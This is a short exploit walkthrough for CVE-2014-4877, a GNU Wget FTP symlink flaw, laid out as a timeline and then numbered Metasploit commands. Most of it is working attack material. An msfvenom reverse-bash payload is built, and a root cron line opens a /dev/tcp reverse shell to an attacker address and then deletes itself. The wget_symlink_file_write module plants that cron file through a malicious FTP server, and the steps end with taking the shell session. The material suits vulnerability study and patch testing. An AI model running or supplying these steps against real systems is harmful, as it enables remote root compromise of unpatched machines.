CVE-2014-4877 GNU Wget FTP Symlink Arbitrary Filesystem Access

Timeline :

Vulnerability discovered by hdm the 2014-08-24
Vulnerability notified to vendor the 2014-08-24
Patched by the vendor the 2014-09-01
Advisory release the 2014-10-27
Metasploit PoC provided the 2014-10-27

PoC provided by :

HD Moore of Rapid7

Reference(s) :

CVE-2014-4877

Affected version(s) :

All GNU Wget before version 1.16

Tested on :

Ubuntu Server 12.10 with GNU Wget version 1.13.4 and root user

Description :

This module exploits a vulnerability in Wget when used in recursive (-r) mode with a FTP server as a destination. A symlink is used to allow arbitrary writes to the target’s filesystem. To specify content for the file, use the “file:/path” syntax for the TARGET_DATA option. Tested successfully with wget 1.14. Versions prior to 1.16 are presumed vulnerable.

Commands :

1. Create a reverse bash payload

msfvenom -p cmd/unix/reverse_bash -f raw LHOST=192.168.6.138

2. Create a crontab file that run once a minute, that launches the bellow command

cat>cronshell <usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '0<&148-;exec 148<>/dev/tcp/192.168.6.138/4444;sh <&148 >&148 2>&148’; rm -f /etc/cron.d/cronshell
EOD

3. Run a shell listener in Metasploit

use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_bash
set LHOST 192.168.6.138
run -j

4. Run the wget_symlink_file_write Metasploit module

use auxiliary/server/wget_symlink_file_write
set SRVHOST 192.168.6.138
set TARGET_FILE /etc/cron.d/cronshell
set TARGET_DATA file:/root/cronshell
set SRVPORT 21
run

5. On victim machine execute the bellow command

wget -m ftp://192.168.6.138:21/

6. Get the Metasploit session

session -i 1

id
uname -a